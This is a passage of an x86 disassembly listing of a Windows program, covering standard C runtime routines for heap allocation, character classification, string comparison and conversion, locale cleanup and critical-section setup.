; sub_41E597+28�j ...
pop esi
pop ebp
retn
sub_41E597 endp
; =============== S U B R O U T I N E =======================================
sub_41E5F7 proc near ; CODE XREF: sub_418A1C+317�p
; sub_418A1C+6F7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_4191CF
mov eax, [eax+64h]
cmp eax, off_4323FC
jz short loc_41E60C
call sub_419FFE
loc_41E60C: ; CODE XREF: sub_41E5F7+E�j
push [esp+arg_4]
push [esp+4+arg_0]
push eax
call sub_41E597
add esp, 0Ch
retn
sub_41E5F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E61E proc near ; CODE XREF: sub_4191CF+23�p
; sub_419240+29�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041E6D1 SIZE 00000008 BYTES
push 10h
push offset stru_42C9D8
call __SEH_prolog
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+var_1C], esi
test esi, esi
jnz short loc_41E639
inc esi
loc_41E639: ; CODE XREF: sub_41E61E+18�j
; sub_41E61E+9F�j
xor edi, edi
mov [ebp+var_20], edi
cmp esi, 0FFFFFFE0h
ja short loc_41E6A8
cmp dword_482984, 3
jnz short loc_41E693
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov ebx, [ebp+var_1C]
cmp ebx, dword_482970
ja short loc_41E693
push 4
call sub_41A1D6
pop ecx
and [ebp+ms_exc.disabled], edi
push ebx
call sub_41AA2E
pop ecx
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E6C8
mov edi, [ebp+var_20]
test edi, edi
jz short loc_41E697
push [ebp+var_1C]
push 0
push edi
call sub_41E8F0
add esp, 0Ch
loc_41E693: ; CODE XREF: sub_41E61E+2C�j
; sub_41E61E+40�j
test edi, edi
jnz short loc_41E6D1
loc_41E697: ; CODE XREF: sub_41E61E+65�j
push esi
push 8
push dword_482980
call dword_42205C ; RtlAllocateHeap
mov edi, eax
loc_41E6A8: ; CODE XREF: sub_41E61E+23�j
test edi, edi
jnz short loc_41E6D1
cmp dword_481334, edi
jz short loc_41E6D1
push esi
call sub_41AD78
pop ecx
test eax, eax
jnz loc_41E639
jmp short loc_41E6D3
sub_41E61E endp
; =============== S U B R O U T I N E =======================================
sub_41E6C5 proc near ; DATA XREF: .text:stru_42C9D8�o
mov esi, [ebp+0Ch]
sub_41E6C5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E6C8 proc near ; CODE XREF: sub_41E61E+5B�p
push 4
call sub_41A142
pop ecx
retn
sub_41E6C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E61E
loc_41E6D1: ; CODE XREF: sub_41E61E+77�j
; sub_41E61E+8C�j ...
mov eax, edi
loc_41E6D3: ; CODE XREF: sub_41E61E+A5�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41E61E
; =============== S U B R O U T I N E =======================================
sub_41E6D9 proc near ; CODE XREF: sub_4192C5+CF�p
; sub_4192C5+301�p ...
arg_0 = dword ptr 4
call sub_4191CF
mov eax, [eax+64h]
cmp eax, off_4323FC
jz short loc_41E6EE
call sub_419FFE
loc_41E6EE: ; CODE XREF: sub_41E6D9+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41E704
push 4
push [esp+4+arg_0]
push eax
call sub_419DFB
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41E704: ; CODE XREF: sub_41E6D9+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
retn
sub_41E6D9 endp
; =============== S U B R O U T I N E =======================================
sub_41E713 proc near ; CODE XREF: sub_4192C5+840�p
; sub_4192C5+922�p
arg_0 = dword ptr 4
call sub_4191CF
mov eax, [eax+64h]
cmp eax, off_4323FC
jz short loc_41E728
call sub_419FFE
loc_41E728: ; CODE XREF: sub_41E713+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41E741
push 80h
push [esp+4+arg_0]
push eax
call sub_419DFB
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41E741: ; CODE XREF: sub_41E713+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
retn
sub_41E713 endp
; =============== S U B R O U T I N E =======================================
sub_41E752 proc near ; CODE XREF: sub_4192C5+3F�p
; sub_4192C5+5A�p ...
arg_0 = dword ptr 4
call sub_4191CF
mov eax, [eax+64h]
cmp eax, off_4323FC
jz short loc_41E767
call sub_419FFE
loc_41E767: ; CODE XREF: sub_41E752+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41E77D
push 8
push [esp+4+arg_0]
push eax
call sub_419DFB
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41E77D: ; CODE XREF: sub_41E752+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
retn
sub_41E752 endp
; =============== S U B R O U T I N E =======================================
sub_41E78C proc near ; CODE XREF: sub_4192C5+6D�p
; sub_4192C5+3DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41E7D8
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41E7AA
test al, al
jns short loc_41E7D8
test al, 2
jnz short loc_41E7D8
loc_41E7AA: ; CODE XREF: sub_41E78C+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41E7B7
push esi
call sub_41E529
pop ecx
loc_41E7B7: ; CODE XREF: sub_41E78C+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41E7C7
cmp dword ptr [esi+4], 0
jnz short loc_41E7D8
inc eax
mov [esi], eax
loc_41E7C7: ; CODE XREF: sub_41E78C+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_41E7DE
cmp [eax], bl
jz short loc_41E7E0
inc eax
mov [esi], eax
loc_41E7D8: ; CODE XREF: sub_41E78C+9�j
; sub_41E78C+18�j ...
or eax, 0FFFFFFFFh
loc_41E7DB: ; CODE XREF: sub_41E78C+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41E7DE: ; CODE XREF: sub_41E78C+43�j
mov [eax], bl
loc_41E7E0: ; CODE XREF: sub_41E78C+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41E7DB
sub_41E78C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7F8 proc near ; CODE XREF: sub_41E8B8+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_41E81C
cmp [ebp+arg_C], ebx
jz short loc_41E81C
mov al, [edi]
cmp al, bl
jnz short loc_41E823
mov eax, [ebp+arg_4]
cmp eax, ebx
jz short loc_41E81C
mov [eax], bx
loc_41E81C: ; CODE XREF: sub_41E7F8+D�j
; sub_41E7F8+12�j ...
xor eax, eax
loc_41E81E: ; CODE XREF: sub_41E7F8+44�j
; sub_41E7F8+8D�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41E823: ; CODE XREF: sub_41E7F8+18�j
mov esi, [ebp+arg_0]
cmp [esi+14h], ebx
jnz short loc_41E83E
mov ecx, [ebp+arg_4]
cmp ecx, ebx
jz short loc_41E839
movzx ax, al
mov [ecx], ax
loc_41E839: ; CODE XREF: sub_41E7F8+38�j
; sub_41E7F8+AB�j
xor eax, eax
inc eax
jmp short loc_41E81E
; ---------------------------------------------------------------------------
loc_41E83E: ; CODE XREF: sub_41E7F8+31�j
mov ecx, [esi+48h]
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E887
mov eax, [esi+28h]
cmp eax, 1
jle short loc_41E875
cmp [ebp+arg_C], eax
jl short loc_41E875
xor ecx, ecx
cmp [ebp+arg_4], ebx
setnz cl
push ecx
push [ebp+arg_4]
push eax
push edi
push 9
push dword ptr [esi+4]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41E882
loc_41E875: ; CODE XREF: sub_41E7F8+59�j
; sub_41E7F8+5E�j
mov eax, [ebp+arg_C]
cmp eax, [esi+28h]
jb short loc_41E8A5
cmp [edi+1], bl
jz short loc_41E8A5
loc_41E882: ; CODE XREF: sub_41E7F8+7B�j
mov eax, [esi+28h]
jmp short loc_41E81E
; ---------------------------------------------------------------------------
loc_41E887: ; CODE XREF: sub_41E7F8+51�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
push eax
push [ebp+arg_4]
push 1
push edi
push 9
push dword ptr [esi+4]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41E839
loc_41E8A5: ; CODE XREF: sub_41E7F8+83�j
; sub_41E7F8+88�j
call sub_41B9A5
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_41E81E
sub_41E7F8 endp
; =============== S U B R O U T I N E =======================================
sub_41E8B8 proc near ; CODE XREF: sub_4192C5+68F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_4191CF
mov eax, [eax+64h]
cmp eax, off_4323FC
jz short loc_41E8CD
call sub_419FFE
loc_41E8CD: ; CODE XREF: sub_41E8B8+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_41E7F8
add esp, 10h
retn
sub_41E8B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41E8F0 proc near ; CODE XREF: sub_4192C5+512�p
; sub_41BD6A+8C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41E94B
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41E93B
neg ecx
and ecx, 3
jz short loc_41E91D
sub edx, ecx
loc_41E913: ; CODE XREF: sub_41E8F0+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_41E913
loc_41E91D: ; CODE XREF: sub_41E8F0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41E93B
rep stosd
test edx, edx
jz short loc_41E945
loc_41E93B: ; CODE XREF: sub_41E8F0+18�j
; sub_41E8F0+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_41E93B
loc_41E945: ; CODE XREF: sub_41E8F0+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E94B: ; CODE XREF: sub_41E8F0+A�j
mov eax, [esp+arg_0]
retn
sub_41E8F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E950 proc near ; CODE XREF: sub_419DFB+60�p
; sub_41CFD4+A4�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_42C9E8
call __SEH_prolog
xor esi, esi
cmp dword_48145C, esi
jnz short loc_41E99B
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_42C148
push edi
call dword_422158 ; GetStringTypeW
test eax, eax
jz short loc_41E986
mov dword_48145C, edi
jmp short loc_41E99B
; ---------------------------------------------------------------------------
loc_41E986: ; CODE XREF: sub_41E950+2C�j
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41E99B
mov dword_48145C, 2
loc_41E99B: ; CODE XREF: sub_41E950+14�j
; sub_41E950+34�j ...
mov eax, dword_48145C
cmp eax, 2
jz loc_41EA93
cmp eax, esi
jz loc_41EA93
cmp eax, 1
jnz loc_41EAB9
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_10], esi
jnz short loc_41E9CD
mov eax, dword_4814A8
mov [ebp+arg_10], eax
loc_41E9CD: ; CODE XREF: sub_41E950+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call dword_4220D4 ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_41EAB9
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_41E8F0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41EA3E
; ---------------------------------------------------------------------------
loc_41EA29: ; DATA XREF: .text:stru_42C9E8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41EA2D: ; DATA XREF: .text:stru_42C9E8�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_41EA3E: ; CODE XREF: sub_41E950+D7�j
test esi, esi
jnz short loc_41EA59
push edi
push 2
call sub_41E61E
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_41EAB9
mov [ebp+var_24], 1
loc_41EA59: ; CODE XREF: sub_41E950+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jz short loc_41EA81
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_422158 ; GetStringTypeW
mov [ebp+var_20], eax
loc_41EA81: ; CODE XREF: sub_41E950+11E�j
cmp [ebp+var_24], 0
jz short loc_41EA8E
push esi
call sub_416D07
pop ecx
loc_41EA8E: ; CODE XREF: sub_41E950+135�j
mov eax, [ebp+var_20]
jmp short loc_41EB01
; ---------------------------------------------------------------------------
loc_41EA93: ; CODE XREF: sub_41E950+53�j
; sub_41E950+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_41EAA0
mov ebx, dword_481498
loc_41EAA0: ; CODE XREF: sub_41E950+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_41EAAD
mov edi, dword_4814A8
loc_41EAAD: ; CODE XREF: sub_41E950+155�j
push ebx
call sub_4202EF
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41EABD
loc_41EAB9: ; CODE XREF: sub_41E950+64�j
; sub_41E950+A5�j ...
xor eax, eax
jmp short loc_41EB01
; ---------------------------------------------------------------------------
loc_41EABD: ; CODE XREF: sub_41E950+167�j
cmp eax, edi
jz short loc_41EADF
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_420338
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_41EAB9
mov [ebp+arg_4], esi
loc_41EADF: ; CODE XREF: sub_41E950+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_4221D8 ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_41EAFF
push esi
call sub_416D07
pop ecx
loc_41EAFF: ; CODE XREF: sub_41E950+1A6�j
mov eax, edi
loc_41EB01: ; CODE XREF: sub_41E950+141�j
; sub_41E950+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_41E950 endp
; =============== S U B R O U T I N E =======================================
sub_41EB0A proc near ; CODE XREF: sub_419E72+B1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41EC98
push dword ptr [esi+4]
call sub_416D07
push dword ptr [esi+8]
call sub_416D07
push dword ptr [esi+0Ch]
call sub_416D07
push dword ptr [esi+10h]
call sub_416D07
push dword ptr [esi+14h]
call sub_416D07
push dword ptr [esi+18h]
call sub_416D07
push dword ptr [esi]
call sub_416D07
push dword ptr [esi+20h]
call sub_416D07
push dword ptr [esi+24h]
call sub_416D07
push dword ptr [esi+28h]
call sub_416D07
push dword ptr [esi+2Ch]
call sub_416D07
push dword ptr [esi+30h]
call sub_416D07
push dword ptr [esi+34h]
call sub_416D07
push dword ptr [esi+1Ch]
call sub_416D07
push dword ptr [esi+38h]
call sub_416D07
push dword ptr [esi+3Ch]
call sub_416D07
add esp, 40h
push dword ptr [esi+40h]
call sub_416D07
push dword ptr [esi+44h]
call sub_416D07
push dword ptr [esi+48h]
call sub_416D07
push dword ptr [esi+4Ch]
call sub_416D07
push dword ptr [esi+50h]
call sub_416D07
push dword ptr [esi+54h]
call sub_416D07
push dword ptr [esi+58h]
call sub_416D07
push dword ptr [esi+5Ch]
call sub_416D07
push dword ptr [esi+60h]
call sub_416D07
push dword ptr [esi+64h]
call sub_416D07
push dword ptr [esi+68h]
call sub_416D07
push dword ptr [esi+6Ch]
call sub_416D07
push dword ptr [esi+70h]
call sub_416D07
push dword ptr [esi+74h]
call sub_416D07
push dword ptr [esi+78h]
call sub_416D07
push dword ptr [esi+7Ch]
call sub_416D07
add esp, 40h
push dword ptr [esi+80h]
call sub_416D07
push dword ptr [esi+84h]
call sub_416D07
push dword ptr [esi+88h]
call sub_416D07
push dword ptr [esi+8Ch]
call sub_416D07
push dword ptr [esi+90h]
call sub_416D07
push dword ptr [esi+94h]
call sub_416D07
push dword ptr [esi+98h]
call sub_416D07
push dword ptr [esi+9Ch]
call sub_416D07
push dword ptr [esi+0A0h]
call sub_416D07
push dword ptr [esi+0A4h]
call sub_416D07
push dword ptr [esi+0A8h]
call sub_416D07
add esp, 2Ch
loc_41EC98: ; CODE XREF: sub_41EB0A+7�j
pop esi
retn
sub_41EB0A endp
; =============== S U B R O U T I N E =======================================
sub_41EC9A proc near ; CODE XREF: sub_419E72+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41ECF7
mov eax, [esi]
mov ecx, off_432DB4
cmp eax, [ecx]
jz short loc_41ECBE
cmp eax, off_432D84
jz short loc_41ECBE
push eax
call sub_416D07
pop ecx
loc_41ECBE: ; CODE XREF: sub_41EC9A+13�j
; sub_41EC9A+1B�j
mov eax, [esi+4]
mov ecx, off_432DB4
cmp eax, [ecx+4]
jz short loc_41ECDB
cmp eax, off_432D88
jz short loc_41ECDB
push eax
call sub_416D07
pop ecx
loc_41ECDB: ; CODE XREF: sub_41EC9A+30�j
; sub_41EC9A+38�j
mov esi, [esi+8]
mov eax, off_432DB4
cmp esi, [eax+8]
jz short loc_41ECF7
cmp esi, off_432D8C
jz short loc_41ECF7
push esi
call sub_416D07
pop ecx
loc_41ECF7: ; CODE XREF: sub_41EC9A+7�j
; sub_41EC9A+4C�j ...
pop esi
retn
sub_41EC9A endp
; =============== S U B R O U T I N E =======================================
sub_41ECF9 proc near ; CODE XREF: sub_419E72+3A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41EDD0
mov eax, [esi+0Ch]
mov ecx, off_432DB4
cmp eax, [ecx+0Ch]
jz short loc_41ED23
cmp eax, off_432D90
jz short loc_41ED23
push eax
call sub_416D07
pop ecx
loc_41ED23: ; CODE XREF: sub_41ECF9+19�j
; sub_41ECF9+21�j
mov eax, [esi+10h]
mov ecx, off_432DB4
cmp eax, [ecx+10h]
jz short loc_41ED40
cmp eax, off_432D94
jz short loc_41ED40
push eax
call sub_416D07
pop ecx
loc_41ED40: ; CODE XREF: sub_41ECF9+36�j
; sub_41ECF9+3E�j
mov eax, [esi+14h]
mov ecx, off_432DB4
cmp eax, [ecx+14h]
jz short loc_41ED5D
cmp eax, off_432D98
jz short loc_41ED5D
push eax
call sub_416D07
pop ecx
loc_41ED5D: ; CODE XREF: sub_41ECF9+53�j
; sub_41ECF9+5B�j
mov eax, [esi+18h]
mov ecx, off_432DB4
cmp eax, [ecx+18h]
jz short loc_41ED7A
cmp eax, off_432D9C
jz short loc_41ED7A
push eax
call sub_416D07
pop ecx
loc_41ED7A: ; CODE XREF: sub_41ECF9+70�j
; sub_41ECF9+78�j
mov eax, [esi+1Ch]
mov ecx, off_432DB4
cmp eax, [ecx+1Ch]
jz short loc_41ED97
cmp eax, off_432DA0
jz short loc_41ED97
push eax
call sub_416D07
pop ecx
loc_41ED97: ; CODE XREF: sub_41ECF9+8D�j
; sub_41ECF9+95�j
mov eax, [esi+20h]
mov ecx, off_432DB4
cmp eax, [ecx+20h]
jz short loc_41EDB4
cmp eax, off_432DA4
jz short loc_41EDB4
push eax
call sub_416D07
pop ecx
loc_41EDB4: ; CODE XREF: sub_41ECF9+AA�j
; sub_41ECF9+B2�j
mov esi, [esi+24h]
mov eax, off_432DB4
cmp esi, [eax+24h]
jz short loc_41EDD0
cmp esi, off_432DA8
jz short loc_41EDD0
push esi
call sub_416D07
pop ecx
loc_41EDD0: ; CODE XREF: sub_41ECF9+7�j
; sub_41ECF9+C6�j ...
pop esi
retn
sub_41ECF9 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41EDF4: ; CODE XREF: .text:0041EE01�j
mov al, [edx]
or al, al
jz short loc_41EE03
add edx, 1
bts [esp], eax
jmp short loc_41EDF4
; ---------------------------------------------------------------------------
loc_41EE03: ; CODE XREF: .text:0041EDF8�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_41EE0C: ; CODE XREF: .text:0041EE1C�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_41EE1E
add esi, 1
bt [esp], eax
jnb short loc_41EE0C
loc_41EE1E: ; CODE XREF: .text:0041EE13�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41EE30 proc near ; CODE XREF: sub_41C656+1B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41EE7C
loc_41EE40: ; CODE XREF: sub_41EE30+3C�j
; sub_41EE30+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41EE74
or al, al
jz short loc_41EE70
cmp ah, [ecx+1]
jnz short loc_41EE74
or ah, ah
jz short loc_41EE70
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41EE74
or al, al
jz short loc_41EE70
cmp ah, [ecx+3]
jnz short loc_41EE74
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41EE40
mov edi, edi
loc_41EE70: ; CODE XREF: sub_41EE30+18�j
; sub_41EE30+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41EE74: ; CODE XREF: sub_41EE30+14�j
; sub_41EE30+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41EE7C: ; CODE XREF: sub_41EE30+E�j
test edx, 1
jz short loc_41EE9C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41EE74
add ecx, 1
or al, al
jz short loc_41EE70
test edx, 2
jz short loc_41EE40
loc_41EE9C: ; CODE XREF: sub_41EE30+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41EE74
or al, al
jz short loc_41EE70
cmp ah, [ecx+1]
jnz short loc_41EE74
or ah, ah
jz short loc_41EE70
add ecx, 2
jmp short loc_41EE40
sub_41EE30 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_41EF12
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_41EF13
test eax, 1
jz short loc_41EEF3
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41EF40
add esi, 1
add edi, 1
sub eax, 1
jz short loc_41EF10
loc_41EEF3: ; CODE XREF: .text:0041EEE0�j
; .text:0041EF0E�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41EF40
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41EF40
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41EEF3
loc_41EF10: ; CODE XREF: .text:0041EEF1�j
; .text:0041EF4A�j
pop edi
pop esi
locret_41EF12: ; CODE XREF: .text:0041EEC6�j
retn
; ---------------------------------------------------------------------------
loc_41EF13: ; CODE XREF: .text:0041EED9�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41EF48
repe cmpsd
jz short loc_41EF48
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41EF3B
cmp ch, dh
jnz short loc_41EF3B
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41EF3B
cmp ch, dh
loc_41EF3B: ; CODE XREF: .text:0041EF29�j
; .text:0041EF2D�j ...
mov eax, 0
loc_41EF40: ; CODE XREF: .text:0041EEE6�j
; .text:0041EEF9�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41EF48: ; CODE XREF: .text:0041EF1B�j
; .text:0041EF1F�j
test eax, eax
jz short loc_41EF10
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41EF3B
sub eax, 1
jz short loc_41EF75
cmp dh, ch
jnz short loc_41EF3B
sub eax, 1
jz short loc_41EF75
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41EF3B
sub eax, 1
loc_41EF75: ; CODE XREF: .text:0041EF57�j
; .text:0041EF60�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41EF94: ; CODE XREF: .text:0041EFA1�j
mov al, [edx]
or al, al
jz short loc_41EFA3
add edx, 1
bts [esp], eax
jmp short loc_41EF94
; ---------------------------------------------------------------------------
loc_41EFA3: ; CODE XREF: .text:0041EF98�j
mov esi, [ebp+8]
mov edi, edi
loc_41EFA8: ; CODE XREF: .text:0041EFB5�j
mov al, [esi]
or al, al
jz short loc_41EFBA
add esi, 1
bt [esp], eax
jnb short loc_41EFA8
lea eax, [esi-1]
loc_41EFBA: ; CODE XREF: .text:0041EFAC�j
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41EFC0: ; DATA XREF: sub_41EFD0:loc_41F012�o
push dword ptr [esp+4]
call dword_422154 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EFD0 proc near ; CODE XREF: sub_41A0A4+26�p
; sub_41A157+49�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_42CB38
call __SEH_prolog
mov eax, dword_4814D4
test eax, eax
jnz short loc_41F01C
cmp dword_481184, 1
jz short loc_41F012
push offset aKernel32_dll ; "kernel32.dll"
call dword_4220A4 ; GetModuleHandleA
test eax, eax
jz short loc_41F012
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call dword_422084 ; GetProcAddress
mov dword_4814D4, eax
test eax, eax
jnz short loc_41F01C
loc_41F012: ; CODE XREF: sub_41EFD0+1C�j
; sub_41EFD0+2B�j
mov eax, offset loc_41EFC0
mov dword_4814D4, eax
loc_41F01C: ; CODE XREF: sub_41EFD0+13�j
; sub_41EFD0+40�j
and [ebp+ms_exc.disabled], 0
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; InitializeCriticalSectionAndSpinCount
mov [ebp+var_1C], eax
jmp short loc_41F051
; ---------------------------------------------------------------------------
loc_41F02D: ; DATA XREF: .text:stru_42CB38�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41F03B: ; DATA XREF: .text:stru_42CB38�o
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_20], 0C0000017h
jnz short loc_41F04F
push 8
call dword_422174 ; RtlSetLastWin32Error
loc_41F04F: ; CODE XREF: sub_41EFD0+75�j
xor eax, eax
loc_41F051: ; CODE XREF: sub_41EFD0+5B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_41EFD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
